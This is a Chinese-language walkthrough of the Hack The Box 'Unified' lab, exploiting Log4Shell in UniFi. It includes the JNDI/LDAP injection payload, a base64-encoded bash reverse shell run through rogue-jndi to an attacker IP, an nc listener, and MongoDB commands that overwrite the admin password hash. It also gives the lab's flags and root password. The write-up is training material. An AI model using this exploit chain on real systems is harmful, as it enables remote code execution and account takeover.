Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Unified

本次探讨在一个非常著名的网络设备监控系统“UniFi”中利用 Log4J 的效果。这台靶机展示了如何设置和安装必要的软件包和工具，以通过滥用 Log4J 漏洞利用 UniFi 并操纵名为 remember 的 POST 标头，为您提供机器上的反向 shell。您还将通过更改系统上运行的 MongoDB 实例中保存的哈希值来更改管理员密码，这将允许访问管理面板并导致管理员的 SSH 密码泄露。

涉及内容：UniFi、CVE检索、Log4J、JNDI、LDAP、MongoDB、提权、SSH

废话不多说，开扫：
nmap -sC -sV -v 10.129.248.255
扫描出22,6789,8080,8443端口。

TASK 1，开放了哪些端口？22,6789,8080,8443

TASK 2，最高端口运行哪个软件？从nmap扫描结果来看，在8443端口，http-title为UniFi Network（从8443端口进入也能看到标题为UniFi Network）

TASK 3，该软件版本号是？6.4.54

进入ip:8443端口，看到这里的版本号为6.4.54

TASK 4，已识别漏洞的CVE是多少？CVE-2021-44228

我们在一些CVE搜索网站里如https://cve.mitre.org/，搜索一下UniFi

| CVE-2021-44530 | An injection vulnerability exists in a third-party library used in UniFi Network Version 6.5.53 and earlier (Log4J CVE-2021-44228) allows a malicious actor to control the application.
UniFi Network 6.5.53及以前版本中使用的第三方库存在一个注入漏洞（Log4J CVE-2021-44228），允许恶意行为者控制应用程序。 |
| — | — |

此 Log4J 漏洞可通过注入操作系统命令 (OS Command Injection) 来利用，这是一种 Web 安全漏洞，允许攻击者在运行应用程序的服务器上执行任意操作系统命令，通常会完全破坏应用程序并破坏其数据。

说明该漏洞前，先简单介绍一下JNDI和LDAP：
JNDI是 Java Naming and Directory Interface API 的首字母缩写，Java名称与目录接口。 通过调用此 API，应用程序可以定位资源和其他程序对象。 资源是提供与系统连接的程序对象，例如数据库服务器和消息传递系统。
LDAP是 Lightweight Directory Access Protocol 的首字母缩写，轻量级目录访问协议，它是一种开放的、供应商中立的、行业标准的应用程序协议，用于通过 Internet 或网络访问和维护分布式目录信息服务。LDAP 运行的默认端口是端口 389。

简述一下该漏洞的原理：
org.apache.logging.log4j.core.pattern.MessagePatternConverter类的format()方法发现日志中包含${就会将表达式的内容替换为表达式解析后的内容，而不是表达式本身，从而导致攻击者构造符合要求的表达式供系统执行。${可使用的关键词非常多，例如：${java:os}、${hostName}、${jndi:logging/context-name}等。
org.apache.logging.log4j.core.lookup.StrSubstitutor中提取参数并通过lookup进行内容替换，当日志在打印时遇到${后，Interpolator类以:号作为分割，将表达式内容分割成两部分，前面部分作为prefix，后面部分作为key。然后通过prefix去找对应的lookup，通过对应的lookup实例调用lookup方法，最后将key作为参数带入执行。
POC：${jndi:ldap://my-ip/exp}，除了利用到log4j的递归解析，同样涉及到了JNDI注入，所谓的JNDI注入就是当上文代码中JNDI变量可控时引发的漏洞，它将导致远程class文件加载，从而导致远程代码执行。当这条语句被传入到log4j日志文件中，lookup会将JNDI注入可执行语句执行，程序会通过ldap协议访问my-ip这个地址，然后my-ip就会返回一个包含java代码的class文件的地址，然后程序再通过返回的地址下载class文件并执行，从而达成漏洞利用目的。

漏洞的利用过程：
第一步：向目标发送指定payload，目标对payload进行解析执行，然后会通过ldap链接远程服务，当ldap服务收到请求之后，将请求进行重定向到恶意java class的地址。
第二步：目标服务器收到重定向请求之后，下载恶意class并执行其中的代码，从而执行系统命令。

为了确定是否是这种情况，我们可以在向/api/login发出 POST 请求后，将请求传递给 BurpSuite，BurpSuite 将作为中间人拦截它。 然后可以编辑请求以注入命令。
在8443端口的登陆页面，输入账号密码，勾选Remember Me，然后SIGN IN，用burp拦截。

将有效payload输入到remember参数中。 因为 POST 数据作为 JSON 对象发送，并且payload包含{}，为了防止它被解析为另一个 JSON 对象，我们将其括在""以便将其解析为字符串。这里将remember的true修改为"${jndi:ldap://my_tun0_ip/suiyi}"。
这里显示InvalidPayload即无效载荷，但实际上payload正在运行。

我们在389端口(LDAP)上开启tcpdump，来监听LDAP的网络流量。
sudo tcpdump -i tun0 port 389
然后在运行我们刚才的payload，这里成功监听到流量，目标机的55636端口成功给tun0的ldap发送了信息，我们tun0进行回复一个RST。

注：tcpdump是一个在命令行界面下运行的数据网络数据包分析器计算机程序。它允许用户显示通过计算机连接的网络传输或接收的 TCP/IP 和其他数据包。

首先安装好JDK和MAVEN（请自行搜索安装教程，或者看本靶机的Walkthrouth），这些将帮助我们运行 rogue-jndi Java 应用程序，运行后会启动本地 LDAP 服务器并允许我们从易受攻击的服务器接收连接并执行恶意代码。
TASK 5，已安装的Maven版本是多少？3.6.3

mvn -v 查看版本

克隆rogue-jndi存储库并使用 Maven 构建包。如果觉得速度较慢，可以开代理，用proxychains等工具（proxychains git clone等）
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package

BUILD SUCCESS后会在rogue-jndi/target/目录中创建一个名为 RogueJndi-1.1.jar 的 .jar 文件。 现在我们可以构造payload以传递给 RogueJndi-1-1.jar Java 应用程序。

要使用 Rogue-JNDI 服务器，我们必须构造并传递一个payload，该payload将负责在目标系统上为我们提供一个 shell。对payload进行 Base64 编码，以防止出现任何编码问题。
echo 'bash -c bash -i >&/dev/tcp/your_tun0_ip/port 0>&1' | base64
打印出一串base64编码的字符

创建payload后，启动 Rogue-JNDI 应用程序，同时将payload作为 --command 选项的一部分以及将tun0 IP 地址传递给 --hostname 选项。（注：这里要注意该语句的空格问题）
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNDcvMzMzMyAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "your_tun0_ip"

我们本机开启对3333端口的监听
nc -lvvp 3333
回到我们构造post请求的payload中，将remember的值改为RogueJndi中mapping的值，"remember": "${jndi:ldap://your_tun0_ip:1389/o=tomcat}"

发送请求后，收到一个与我们恶意服务器的连接，显示如下。

nc接收反弹的shell

使用script /dev/null -c bash升级一下shell，变成交互式的shell

我们从/home/michael目录下获得了user flag：6ced1a6a89e666c0620cdb10262ba127

提权
UniFi应用一般用MongoDB作为数据库（MongoDB 是一个源代码可用的跨平台面向文档的数据库程序。 MongoDB 被归类为 NoSQL 数据库程序，它使用带有可选模式的类似 JSON 的文档），我们先使用
ps aux | grep mongo查找一下当前运行的程序中mongoDB运行情况，这里是运行在27117端口。

搜索发现，UniFi默认数据库的名称一般为ace。
通过mongo命令尝试提取管理员密码来与MongoDB服务进行交互。
（db.admin.find()：查询admin表下的所有数据，即查询所有用户；forEach()遍历；printjson，json格式打印）
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
这里得到管理员账号/密码：administrator/$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.

$6意思是SHA-512加密（SHA-512 或安全散列算法 512 是一种散列算法，用于将任意长度的文本转换为固定大小的字符串。 每个输出产生 512 位（64 字节）的 SHA-512 长度。 该算法常用于电子邮件地址散列、密码散列…）
如果我们不知道也没关系，可以使用hashid来判断该密码的类型
hashid '$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.'

这里密码哈希位于 x_shadow 变量中，但在这种情况下，密码破解程序无法破解。但我们可以使用自己创建的哈希更改 x_shadow 密码哈希，以替换管理员密码并通过管理面板进行身份验证。
我们使用 mkpasswd 来创建一个密码，-m：指定加密类型。
mkpasswd -m sha-512 123456

一旦我们生成了 SHA-512 哈希，输出看起来与上面的类似，但是由于盐(salt)的原因，每次生成哈希都会改变。将盐(salt)添加到哈希过程中以强制其唯一性，在不增加用户要求的情况下增加其复杂性，并减轻哈希表等密码攻击。
现在使用我们创建的hash来进行替换（通过administrator的_id进行标识，替换其x_shadow）
mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA_512 Hash Generated"}})'

检查密码是否更新，重新遍历一次，看到x_shadow内容已经替换成我们自己创建的hash值。
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

接下来我们就可以使用administrator/123456登陆到后台。

在后台SETTINGS的Site页面，我们找到了SSH认证的root账号及密码NotACrackablePassword4U2022，我们可以通过SSH连接。

SSH连接到root
ssh root@ip

ls，查看当前目录下内容
cat root.txt，得到root的flag：

下面来回答几个靶机问题：
TASK 6，JNDI注入利用什么协议？LDAP

TASK 7，用什么工具来拦截流量，表明我们攻击成功？tcpdump，监听在389端口（LDAP）有数据流显示。

TASK 8，我们需要检查哪个端口的拦截流量？389，LDAP

TASK 9，MongoDB服务运行在哪个端口？27117

TASK 10，UniFi应用程序的默认数据库名称是什么？ace

TASK 11，在 MongoDB 中用于枚举数据库中的用户的函数是什么？db.admin.find()
TASK 12，MongoDB中向数据库添加数据的函数是什么？db.admin.insert()

TASK 13，更新MongoDB数据的函数是什么？db.admin.update()

TASK 14，root用户的密码是什么？NotACrackablePassword4U2022

最后提交user flag和root flag。